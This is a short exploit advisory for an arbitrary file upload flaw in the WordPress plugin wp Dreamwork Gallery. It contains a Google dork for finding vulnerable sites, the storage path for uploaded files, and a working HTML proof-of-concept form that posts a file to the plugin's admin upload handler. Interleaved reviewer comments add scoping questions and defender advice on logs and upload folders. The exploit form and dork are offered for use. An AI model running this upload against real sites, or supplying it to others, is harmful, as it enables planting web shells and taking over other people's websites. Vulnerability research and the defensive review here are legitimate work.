1 | <!-- | |
2 | ||
3 | ||
4 | \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____ | |
5 | \ \ / /| | '__| | | / __|\ /| | | |_ / | |
6 | \ V / | | | | |_| \__ \/ \| |_| |/ / | |
7 | \_/ |_|_| \__,_|___/_/\_\____//___| | |
8 | ||
9 | --> | |
10 | ######################################################### | |
11 | # Exploit Title: Arbitrary File Upload Vulnerability in wp Dreamwork Gallery | |
12 | # Contact: FB: Abdou MjCodez Tw: VirusXDz | |
13 | # Category: webapps | |
14 | # Google Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ | |
15 | ######################################################## | |
16 | ||
17 | ||
18 | ||
19 | # Proof of Concept | |
20 | ||
21 | The uploaded file is stored in a numbered upload folder under /wp-content/uploads/dreamwork/. | |
22 | ||
23 | Example, with 7 as the folder number ([(7)_uploadfolder]): | |
24 | /wp-content/uploads/dreamwork/7_uploadfolder/big/ | |
25 | ||
26 | ||
<!-- Proof-of-concept request from the advisory: a multipart/form-data POST to the
     plugin's admin page (page=dreamwork_manage) with task=drm_add_new_album and a
     file in the album_img field. -->
<!-- NOTE(review): the form carries no nonce or other anti-CSRF field. The advisory
     states neither the affected plugin versions nor whether an authenticated
     wp-admin session is required. Confirm both before scoping exposure. -->
<!-- Defender view: review web access logs for POST requests to
     admin.php?page=dreamwork_manage, audit the dreamwork upload folders for files
     that are not images, and make sure the web server never executes files stored
     under wp-content/uploads. -->
27 | <html> | |
28 | <body> | |
29 | <form action="http://[path to WordPress]/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> | |
30 | <input type="hidden" name="task" value="drm_add_new_album" /> | |
31 | <input type="hidden" name="album_name" value="Arbitrary File Upload" /> | |
32 | <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> | |
<!-- album_img is the only file field. Presumably the plugin stores it without a
     server-side type or extension check, which is what the advisory title implies;
     verify against the plugin source. -->
33 | <input type="file" name="album_img" value="" /> | |
34 | <input type="submit" value="Submit" /> | |
35 | </form> | |
36 | </body> | |
37 | </html> | |
38 | ||
39 | Video : | |
40 | https://youtu.be/_7uAkAzlFrY | |
41 | ||
42 | Bye |